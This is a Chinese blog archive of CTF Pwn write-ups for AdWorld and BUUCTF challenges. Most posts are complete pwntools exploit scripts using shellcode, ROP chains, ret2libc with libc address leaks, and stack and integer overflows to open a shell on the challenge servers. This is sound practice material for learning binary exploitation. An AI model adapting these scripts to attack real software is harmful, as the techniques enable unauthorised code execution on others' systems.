分类目录归档:Pwn

AdWorld Pwn note-service2

发表评论

新接触的一道题,新题型。。
https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=1&id=4611&page=1
Writeup: https://adworld.xctf.org.cn/media/uploads/writeup/ee65882803c511ea9f5700163e004e93.pdf
开眼23333。。。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
from pwn import *
from LibcSearcher import *
context.log_level="debug"
context(arch="amd64",os="linux")

def create(p,index,size,content):
    p.sendlineafter("your choice>> ","1")
    p.sendlineafter("index:",str(index))
    p.sendlineafter("size:",str(size))
    p.sendafter("content:",content)

def delete(p,index):
    p.sendlineafter("your choice>> ","4")
    p.sendlineafter("index:",str(index))

p = remote("111.198.29.45",34191)
#p = process("./1")

ASM = []
ASM.append(asm("xor rax,rax") + b"\x90\x90\xeb\x19")
ASM.append(asm("mov eax,0x3b") + b"\xeb\x19")
ASM.append(asm("xor rsi,rsi") + b"\x90\x90\xeb\x19")
ASM.append(asm("xor rdx,rdx") + b"\x90\x90\xeb\x19")
ASM.append(asm("syscall") + b"\x90\x90\x90\x90\x90")

for i in range(0,5):
    create(p,i,8,ASM[i])
delete(p,0)
create(p,-8,8,ASM[0])
p.sendlineafter("your choice>> ","/bin/sh")

p.interactive()

附上i64db:
1f10c9df3d784b5ba04b205c1610a11e

CTF Pwn AdWorld stack2

发表评论

https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=1&id=4695&page=1
新颖题型:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
from pwn import *
context.log_level="debug"
context(arch="amd64",os="linux")

def change(p,offset,num):
    p.sendline("3")
    p.sendline(str(offset))
    p.sendline(str(num))

p = remote("111.198.29.45",48634)
p.sendline("0")

off = 0x84
system_addr = 0x8048450
sh_addr = 0x8048987

for i in range(0,4):
    change(p,off+i,system_addr&0xFF)
    system_addr>>=8

off += 8
for i in range(0,4):
    change(p,off+i,sh_addr&0xFF)
    sh_addr>>=8

p.sendline("5")
p.interactive()

BUUCTF Pwn ciscn_2019_c_1

发表评论

本题涉及了栈对齐问题,这个pwn在ubuntu18上运行,调用system的时候需要加1个retn来去补齐,目前不知道具体的原因。经实验再多加4个retn也可,可知这个栈对齐是32字节的。
2022年1月16日更新:加1个、3个、5个retn都可以,应该是16字节对齐的。原因是Ubuntu 18.04中的Glibc使用的movaps指令需要16字节对齐。可以参考下列资料:https://bbs.pediy.com/thread-269597.htm

from pwn import *
from LibcSearcher import *
context.log_level="debug"
context(arch="amd64",os="linux")

pop_rdi = 0x0000000000400c83
puts_got_addr = 0x602020
puts_plt_addr = 0x4006e0
encrypt_sym_addr = 0x4009A0
ret = 0x4006b9

#p = remote("node3.buuoj.cn",28578)
p=process("./ciscn_2019_c_1")
p.sendline("1")
payload=b'0'*0x50+p64(0)+p64(pop_rdi)+p64(puts_got_addr)+p64(puts_plt_addr)+p64(encrypt_sym_addr)
p.sendline(payload)
p.recvuntil("Ciphertext\n")
p.recvuntil("\n")

GOT_puts=p.recvuntil("\n").split()[0]
print(GOT_puts)
for i in range(len(GOT_puts),8):
    GOT_puts += b'\x00'
GOT_puts = u64(GOT_puts)

libc = LibcSearcher("puts",GOT_puts)
ADDR_LibC_base = GOT_puts - libc.dump("puts")
ADDR_system = ADDR_LibC_base + libc.dump("system")
ADDR_String_Sh = ADDR_LibC_base + libc.dump("str_bin_sh")
payload=b'0'*0x50+p64(0)+p64(ret)+p64(ret)+p64(ret)+p64(ret)+p64(ret)+p64(pop_rdi)+p64(ADDR_String_Sh)+p64(ADDR_system) # 删去4个retn也可
p.sendline(payload)

p.interactive()

CTF Pwn ROP Pwn-100

发表评论

今日学习ROP。并看着WriteUp做出了一道题目。
ROP主要参考资料:(不分先后)
https://www.jianshu.com/p/80d7150dd0a2
https://baike.baidu.com/item/ROP%E7%B3%BB%E7%BB%9F%E6%94%BB%E5%87%BB/16230646?fr=aladdin
https://www.jianshu.com/p/1d7f0c56a323
https://www.cnblogs.com/ichunqiu/p/9288935.html
题目地址:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=1&id=4888&page=1
Exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
from pwn import *
from LibcSearcher import *
context.log_level="debug"
context(arch="amd64",os="linux")

ROP_PopRdi = 0x400763
ADDR_GOT_read = 0x601028
ADDR_PLT_puts = 0x400500
ADDR_SYM_main = 0x4006b8

p = remote("111.198.29.45",30265)
payload1 = b'0'*0x48 + p64(ROP_PopRdi) + p64(ADDR_GOT_read) + p64(ADDR_PLT_puts) + p64(ADDR_SYM_main) + b'0'*(0xc8-0x48-32)
p.send(payload1)
p.recvuntil("bye~\n")


GOT_read = p.recvuntil("\n").split()[0]
for i in range(len(GOT_read),8):
    GOT_read += b'\x00'
GOT_read = u64(GOT_read)

libc = LibcSearcher("read",GOT_read)
ADDR_LibC_base = GOT_read - libc.dump("read")
ADDR_system = ADDR_LibC_base + libc.dump("system")
ADDR_String_Sh = ADDR_LibC_base + libc.dump("str_bin_sh")
payload2 = b'0'*0x48 + p64(ROP_PopRdi) + p64(ADDR_String_Sh) + p64(ADDR_system) + b'0'*(0xc8-0x48-24)
p.send(payload2)
p.recvuntil("bye~\n")

p.interactive()

ADWorld Pwn level3

发表评论

完全看着WriteUp写的,里面说了个PLT和GOT表,这个概念之前接触过一点,但没怎么用过。模仿人家代码的时候也没怎么细想。先敲一遍将来就理解深刻了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
from pwn import *
p = remote("111.198.29.45",33161)
elf = ELF("./level3")
libc = ELF("./libc_32.so.6")
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=elf.sym['main']
p.recvuntil(":\n")
payload=b'0'*0x88+p32(0)+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
p.sendline(payload)
write_got_addr=u32(p.recv())
print(hex(write_got_addr))
libc_base=write_got_addr-libc.sym['write']
print(hex(libc_base))
system_addr=libc_base+libc.sym['system']
print(hex(system_addr))
binshaddr=libc_base+0x15902B
print(hex(binshaddr))
payload2=b'0'*0x88+p32(0)+p32(system_addr)+p32(0)+p32(binshaddr)
p.recvuntil(":\n")
p.sendline(payload2)
p.interactive()

ADWorld Pwn cgpwn2

发表评论

好像会点了^v^

1
2
3
4
5
6
7
8
9
from pwn import *
p = remote("111.198.29.45",55602)
p.sendlineafter("your name","/bin/sh")
strAddr=0x0804A080
sysAddr=0x08048420
payload=b'0'*(0x26+0x4)+p32(sysAddr)+p32(0)+p32(strAddr)
print(len(payload))
p.sendlineafter("here:",payload)
p.interactive()

ADWorld Pwn int_overflow

发表评论

整数溢出的题目,之前从没做过,所以看了WriteUp。

1
2
3
4
5
6
7
8
9
from pwn import *
p = remote("111.198.29.45",56345)
p.sendlineafter("Your choice:","1")
p.sendlineafter("username:","123")
flagAddr=0x0804868B
payload=b'0'*(0x14+0x4)+p32(flagAddr)+b'0'*(0x105-0x8-0x14)
print(len(payload))
p.sendlineafter("passwd:",payload)
p.interactive()

ADWorld Pwn guess_num

发表评论

经Imagin大佬入门指点开始没事干闲的做点PWN玩,看了两个栈溢出的例子Writeup体验了一下,这个是第三个题目,自己做了一下,做出来了。
栈溢出覆盖随机数种子,写一个C程序用gcc编译一下能生成一模一样的随机数。
Pwn代码如下

1
2
3
4
5
from pwn import *
p = remote("111.198.29.45",44610)
payload=bytearray('0'*0x24,"utf-8")
p.sendline(payload)
p.interactive()